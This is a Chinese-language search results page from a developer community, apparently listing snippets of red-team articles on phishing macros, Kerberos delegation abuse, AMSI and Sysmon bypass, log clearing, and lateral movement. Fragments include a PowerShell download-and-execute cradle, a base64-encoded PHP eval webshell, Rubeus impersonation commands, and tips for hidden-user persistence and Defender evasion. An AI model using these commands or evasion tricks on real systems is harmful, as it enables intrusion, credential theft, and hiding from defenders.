首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Khan安全团队

    Tips

    在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。

    34130编辑于 2022-04-02
  • 来自专栏Khan安全团队

    利器 - SharpSniper

    通常,参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。

    35520编辑于 2022-07-13
  • 来自专栏渗透测试教程

    - 渗透小技巧

    这些有明显特征的 4.大框架类似,二次模改过来的,比如(onethink-->thinkphp) 5.报错关键字提取,去github找有没有相似源码以及类似函数,报错信息可以用google语法收集warning 4.遇到一个cms存在盲注,数据出的很慢,我们可以自己本地搭建一个,查看账号密码放在哪个表单。 3.注册账号的时候可以尝试admin空格空格空格空格空格空格,看看可不可以覆盖 (4)上传 1.条件竞争其实挺多的,tp写入session也可以想到条件竞争 2.二次渲染,不仅是要了解,而且要大环境复线 4.看看有没有.user.ini这个文件,有的话走大运 5.白名单,这类没有解析漏洞或者开发商本身的漏洞,就别想着绕过了。 (4)权限维持 这一步和提权是一样的,我们应该明白什么时候需要权限维持,不是打点进去,一个pth上了三四太机器,然后每一个做一个自启,或者直接注册表修改添加隐藏用户,又或者激活guest。

    1.7K40发布于 2021-07-23
  • 来自专栏Gamma安全实验室

    技巧-网络钓鱼

    前言 涵盖了现在大多数钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a IEX (New-ObjectNet.WebClient) 文件是可以执行js代码的,那么就可以配合jsbackdoor 来进行权限获取,这里推荐一个项目: https://github.com/Ridter/MyJSRat 一个py版本的JSbackdoor 4.

    3.4K10发布于 2021-03-10
  • 来自专栏HACK学习

    | InlineHook技术实现

    ; DWORD ESP; DWORD ESI; DWORD EDI; }regeist; regeist reg = { 0 }; 然后第22~28行的值由于pushad和pushfd了,偏移不能是+4 y + z; } 测试 DWORD TestInlineHook() { PAddr = (BYTE*)Test + 1; PAddr += *(DWORD*)PAddr+ 4; ) { return x + y + z; } DWORD TestInlineHook() { PAddr = (BYTE*)Test + 1; PAddr += *(DWORD*)PAddr + 4;

    79940发布于 2021-05-14
  • 来自专栏Khan安全团队

    笔记 - 横向移动

    此属性包含允许在其上使用的 SPN s4u2proxy,即基于现有 TGS(通常是使用 获得的s4u2self)为该服务器请求可转发 TGS 。这有效地定义了允许约束委派的后端服务。 如果s4u2proxy允许而没有s4u2self,则需要用户交互才能从用户那里获取到前端服务的有效 TGS,类似于无约束委派。 # Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN . \Rubeus.exe s4u /ticket:doIE+jCCBP... 在这种情况下,s4u2self和s4u2proxy如上所述用于代表用户请求可转发票证。

    2.4K10发布于 2021-10-12
  • 来自专栏HACK学习

    | Windows命名管道

    翻译就是:管道就是一部份共享内存以便进程可以用来相互通信,创建了Pipe内核对象的进程就是一个Pipe Server, 当另一个进程与这个进程创建的Pipe Server连接时,就称为Pipe Client.当一个进程往Piple当中写入信息时,另一个进程便可以从这个Pipe读出这个信息。

    2.5K20发布于 2021-06-24
  • 来自专栏Khan安全团队

    笔记 - 后渗透

    USERNAME]\AppData\Roaming\Microsoft\Protect\S-1-5-21-3865823697-1816233505-1834004910-1124\dd89dddf-946b-4a80 -9fd3-7f03ebd41ff4 # Decrypt the secret using the retrieved master key # Alternatively, leave out /masterkey

    1.3K41发布于 2021-10-12
  • 来自专栏渗透测试红队专栏

    实战攻防(一)

    大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写攻防相关的文章了,那么近期将带来 “实战攻防技术” 系列的文章。 当前行业内组织的 “蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以的视角去阐述技术思想。 与常规的渗透测试相比,攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 对于一些新晋的同学,风起哥建议首先做好基础建设,比如免杀、隐匿、工具特征改造、匿名VPS、邮箱、手机号、身份信息等,最好在纯净的虚拟机中进行渗透操作(别搁虚拟机里看什么腾讯视频)。

    1K50发布于 2021-08-23
  • 来自专栏全栈程序员必看

    靶机实战(2)

    一天一靶机 生活充实而有趣,打算这几天把红日的几个靶机都给撸个遍。打起来还挺有意思。

    69820编辑于 2021-12-13
  • 来自专栏潇湘信安

    RequestTemplate内网渗透工具

    RequestTemplate是一款两端并用的渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 蓝对抗中的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测 config.json配置 WEB扫描: 集成Xray三百多种POC检测 漏洞验证: 使用Java端配置代理对扫描结果进行复现验证截图 0x03 RequestTemplate客户端 root@VM-4- scan,for example: 192.168.11.11-255 or 192.168.1.1/24 or /22 /15... 0x04 RequestTemplate服务端 root@VM-4-

    1.7K30编辑于 2022-09-22
  • 来自专栏Khan安全团队

    横向 - 神奇小妙招

    如果将恶意文件命名为 DumpStack.log,Defender 不会对其进行扫描。

    44620编辑于 2022-01-27
  • 来自专栏肖萧然最秀

    常用命令

    /java_exec_encode/ https://www.bugku.net/runtime-exec-payloads/ 手动编码操作 bash -c {echo,cGluZyAxMjcuMC4wLjE7ZWNobyAxID50ZXN0LnR4dA jsp certutil -decodehex 111.txt C:\\111.jsp linux下base64 echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4= +PGgxPjIwMjHlubR4eHjnvZHnu5zlronlhajlrp7miJjmvJTnu4M8L2gxPg==\" > D:\UFGOV\U8\webapps\demonstrate.txt update.exe" enable=yes 端口转发 把本地的 801 端口转发到远程的 172.23.80.14 的 80 端口 netsh interface portproxy add v4tov4 session => 4 msf5 exploit(windows/local/ms13_081_track_popup_menu) > exploit [!]

    5.2K50编辑于 2023-10-13
  • 来自专栏FreeBuf

    渗透项目之GoldenEye

    接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该文章都能学习到一些的技巧和知识。 可以看出是HTML加密: InvincibleHack3r 4、 用户名:dr_doak 密码:4England! 或者用strings获取jpg文件底层内容:strings for-007.jpg 用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ== 9、Base64解码 使用 五、总结 通过以上的学习,我们认知了一些的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap、hysra、pop3-nc、MSF、EXP等等的编译和使用提权等,

    2K20编辑于 2022-02-23
  • 来自专栏FreeBuf

    技巧:绕过Sysmon检测

    Sysmon和Windows事件日志都是防御者中极为强大的工具。它们非常灵活的配置使他们可以深入了解设备上的活动,从而使检测攻击者的过程变得更加容易。出于这个原因,我将带领您完成击败他们的旅程;)

    1.6K20发布于 2020-05-14
  • 来自专栏鸿鹄实验室

    技巧--winAPI添加用户

    在平时的渗透过程中我们经常会使用net来添加用户,但也会经常遇到net无法使用的情况,这里就教大家使用winAPI来添加用户,虽然也是一个比较老的技巧了。

    1.5K20发布于 2021-04-15
  • 来自专栏Gamma安全实验室

    战术-躲避日志检查

    禁用Windows事件日志记录,是最常规手法,为了减少可用于安全人员检测和审核的数据量,提高活动的隐蔽性,人员可以禁用Windows事件日志记录。 \Invoke-Phant0m.ps1 4.Mimikatz 这个就不用多说,不仅可以窃取凭据,还可以从事件查看器中清除日志。 执行命令 clearev 技术博大精深,值得好好钻研,细品,每天进步一点点,日积月累也是很大的技术积累。 欢迎大家加入知识星球交流学习,感受网络安全的魅力。 ? ? END

    1.4K20发布于 2021-04-28
  • 来自专栏谢公子学安全

    测试之邮箱打点

    https://github.com/bit4woo/teemo 还有从搜索引擎、空间搜索引擎、社交、招聘网站等搜邮箱的方式。 3)CVE-2018-2174 exp地址: https://github.com/0x09AL/CVE-2018-8174-msf.git 4)Windows 快捷键 先利用MSF生成一段payload 另外还有利用目标登录口的钓鱼页面来窃取各种, Vpn , Mail , OA ,账号密码等,实际钓鱼方式与细节非常多不一一举例了。

    1.4K20编辑于 2022-01-20
  • 来自专栏Gamma安全实验室

    技巧-常规横向手法

    前言 域内横向移动技术是作战在域内最基本技术之一,人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 servicename] binpath= "[path]" #创建计划任务启动程序 sc \\WIN-ENS2VR5TR3N create bindshell binpath= "c:\Gamma.exe" 4. 4.运行完后删除服务。 4.当用户输入命令时,WMI创建进程执行该命令,然后把结果输出到文件,这个文件位于之前创建的共享文件夹中。 5.通过FSO组件访问远程共享文件夹中的结果文件,将结果输出。 4.使用COM对象进行横向 DCOM是[COM](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363(v=vs.85).aspx

    2.9K20发布于 2021-07-01
  • 来自专栏Khan安全团队

    笔记 - PowerShell AMSI Bypass

    GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.' g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli' 目的 Invoke-CradleCrafter 的存在是为了帮助蓝轻松探索、生成和混淆 PowerShell 远程下载托架。

    1.4K20发布于 2021-10-12
领券